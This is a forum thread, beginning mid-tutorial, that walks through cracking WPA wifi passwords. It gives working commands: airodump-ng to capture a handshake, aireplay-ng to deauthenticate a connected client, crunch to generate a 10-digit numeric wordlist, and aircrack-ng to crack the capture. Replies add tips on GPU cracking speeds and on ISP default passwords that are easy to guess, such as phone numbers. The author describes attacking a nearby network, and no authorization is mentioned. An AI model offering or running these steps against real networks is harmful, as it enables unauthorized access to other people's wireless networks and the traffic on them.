airodump-ng mon0Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.4. Copy down the AP Mac, the Client Mac, and the channel numberAfter you've copied that you can close the other windows.5. In a new terminal windows type in:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)

/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txtIF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txtJust a quick run through. Its easy, but its the cracking that will take a while. Hope they have WPS, if they do, that becomes much easier There are also several wordlists available. You can use whatever wordlist you want. Also as long as you have the capture file, you can crack it on any system. You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]

Enjoy WPA cracking!

-TRAiN3R

Logged

Remember, remember the Fifth of November,the Gunpowder Treason and Plot,

if you have a specific network you want to break in I would recommend setting the monitor interface to the specific channel and I would not use airmon-ng for that task (had some problems in the past with it. For example your mon interface stays until next reboot). I would just use the linux commands to set my wifi card in monitor mode on a specific channel

I always use that set of commands instead of airmon. I believe it's because airmon couldn't activate monitor mode if another process was using the network interface (like dhclient, etc...).

@OP: Don't take me the wrong way, but I think you should explain what each command does. Else every newbie who follows the tutorial will know how to perform the attack, but won't have the knowledge of how and why it works. Just my 2 cents.

airodump-ng mon0Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.4. Copy down the AP Mac, the Client Mac, and the channel numberAfter you've copied that you can close the other windows.5. In a new terminal windows type in:

aireplay-ng --deauth 1 -a {APMAC} -c {CLIENTMAC} mon0After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)

/pentest/passwords/crunch/./crunch 10 10 0123456789 -o /pentest/passwords/wordlists/2wirewl.txtIF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:

aircrack-ng {CAPTUREFILE}-01.cap -w /pentest/passwords/wordlists/2wirewl.txtJust a quick run through. Its easy, but its the cracking that will take a while. Hope they have WPS, if they do, that becomes much easier There are also several wordlists available. You can use whatever wordlist you want. Also as long as you have the capture file, you can crack it on any system. You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]

Enjoy WPA cracking!

-TRAiN3R

Bruteforcing WPA especially with only CPU is just plain retarted.This will take months or even years to finish even with the latest CPU's on the market.Even with very heavy GPU's bruteforcing could take a week or more.The only viable attack would be a dictionary one.

Logged

Or not.

« Last Edit: Yesterday at 09:34:29 am by Kulverstukas »« Last Edit: Today at 13:37:00 am by ande »

Bruteforcing WPA especially with only CPU is just plain retarted.This will take months or even years to finish even with the latest CPU's on the market.Even with very heavy GPU's bruteforcing could take a week or more.The only viable attack would be a dictionary one.

Quote from: TRAiN3R

After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor.

Hrm as far as I know pyrit AND Elcomsoft Wireless Security Auditor both utilize GPU cores. And of course the bigger the dictionary, the longer it would take. Your words of circles make no sense.

Also TRAiN3R even hints at the fact that you will want a good system:

Quote from: TRAiN3R

You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]

Bruteforcing aka random characters is not viable for WPA and WPA2.This cannot really be concidered a dictionary attack.Thats what I was pointing out.Even with a massive cloud this could take years.

So yeah thats what I was saying.

Well on my laptop I can crack about 8000 PMK's.Which is cute.With some proper ATI cards X00.000 PMK's is not uncommon.Some good dictionaries help out.However where I live most people appear to just leave it at the default.Which is bad for me.

« Last Edit: December 17, 2012, 04:09:15 pm by proxx »

Logged

Or not.

« Last Edit: Yesterday at 09:34:29 am by Kulverstukas »« Last Edit: Today at 13:37:00 am by ande »

Bruteforcing aka random characters is not viable for WPA and WPA2.This cannot really be concidered a dictionary attack.Thats what I was pointing out.Even with a massive cloud this could take years.

So yeah thats what I was saying.

Well on my laptop I can crack about 8000 PMK's.Which is cute.With some proper ATI cards X00.000 PMK's is not uncommon.Some good dictionaries help out.However where I live most people appear to just leave it at the default.Which is bad for me.

Well the new default ISPs are using phone numbers now, so you can create a smaller wordlist using your area code then the other digits so they are much smaller files you can even narrow it down further as areas tend to use the same prefixes. And yes 10000+ can be common on good systems. Also a wordlist=dictionary

Well not where I live unfortunately.Just pseaudo random generated strings.However a certain very common ISP uses a random string of upper case letters which is 8 characters long.26^8 is still nasty to crack and even with really good GPU's can take several weeks if not months.

Logged

Or not.

« Last Edit: Yesterday at 09:34:29 am by Kulverstukas »« Last Edit: Today at 13:37:00 am by ande »

Well not where I live unfortunately.Just pseaudo random generated strings.However a certain very common ISP uses a random string of upper case letters which is 8 characters long.26^8 is still nasty to crack and even with really good GPU's can take several weeks if not months.

Very true. All the big ISPs in my area are using phone numbers which makes for a quick crack a passthrough with pyrit (or make an output file to use Elcomsoft on my Win machine)